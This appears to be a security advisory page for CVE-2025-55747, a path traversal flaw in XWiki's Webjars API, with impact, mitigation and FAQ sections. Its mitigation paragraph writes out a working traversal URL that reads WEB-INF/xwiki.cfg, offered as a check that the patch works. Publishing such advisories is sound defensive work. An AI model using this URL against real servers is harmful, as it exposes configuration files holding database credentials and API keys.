Platform
java
Component
org.xwiki.platform:xwiki-platform-webjars-api
Fixed in
6.1.1
16.10.7
16.10.7
CVE-2025-55747 describes a path traversal vulnerability discovered in the XWiki Platform Webjars API. This flaw allows attackers to potentially access and read sensitive configuration files by manipulating URLs, bypassing intended access controls. The vulnerability impacts versions of XWiki Platform prior to 16.10.7 and 17.4.0-rc-1, and a patch is available to address the issue.
The primary impact of CVE-2025-55747 is the unauthorized disclosure of sensitive information. By crafting malicious URLs, an attacker can traverse the file system and access files outside of the intended web root. Specifically, the vulnerability allows access to the xwiki.cfg file, which contains configuration details for the XWiki platform. Exposure of this file could reveal database credentials, API keys, and other sensitive settings, enabling further exploitation and potentially leading to complete system compromise. This vulnerability is similar in concept to other path traversal attacks, where improper input validation allows attackers to navigate outside of intended directories.
CVE-2025-55747 was publicly disclosed on September 3, 2025. As of this date, there are no reports of active exploitation in the wild. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are not widely available, but the vulnerability's ease of exploitation suggests a potential for future exploitation if left unpatched.
Exploit Status
EPSS
1.99% (83% percentile)
CISA SSVC
The recommended mitigation for CVE-2025-55747 is to immediately upgrade XWiki Platform to version 16.10.7 or 17.4.0-rc-1. These versions include a fix that prevents the path traversal vulnerability. As there is no known workaround, upgrading is the only viable solution. If upgrading is not immediately feasible, consider implementing strict input validation on all URL parameters to prevent malicious path manipulation. While not a direct fix, this can provide a temporary layer of defense. After upgrading, confirm the fix by attempting to access the vulnerable URL (http://localhost:8080/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg) and verifying that access is denied.
Update XWiki Platform to version 16.10.7 or higher. This version corrects the vulnerability that allows unauthorized access to configuration files through the webjars API. The update ensures that configuration files are protected and not publicly accessible.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-55747 is a critical path traversal vulnerability in the XWiki Platform Webjars API that allows attackers to read sensitive configuration files by manipulating URLs.
Yes, if you are running XWiki Platform versions prior to 16.10.7 or 17.4.0-rc-1, you are vulnerable to this path traversal vulnerability.
Upgrade XWiki Platform to version 16.10.7 or 17.4.0-rc-1. There is no known workaround other than upgrading.
As of September 3, 2025, there are no reports of active exploitation in the wild, but the vulnerability's ease of exploitation suggests a potential for future exploitation.
You can find the official advisory on the XWiki Jira issue tracker: https://jira.xwiki.org/browse/XWIKI-19350
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your pom.xml file and we'll tell you instantly if you're affected.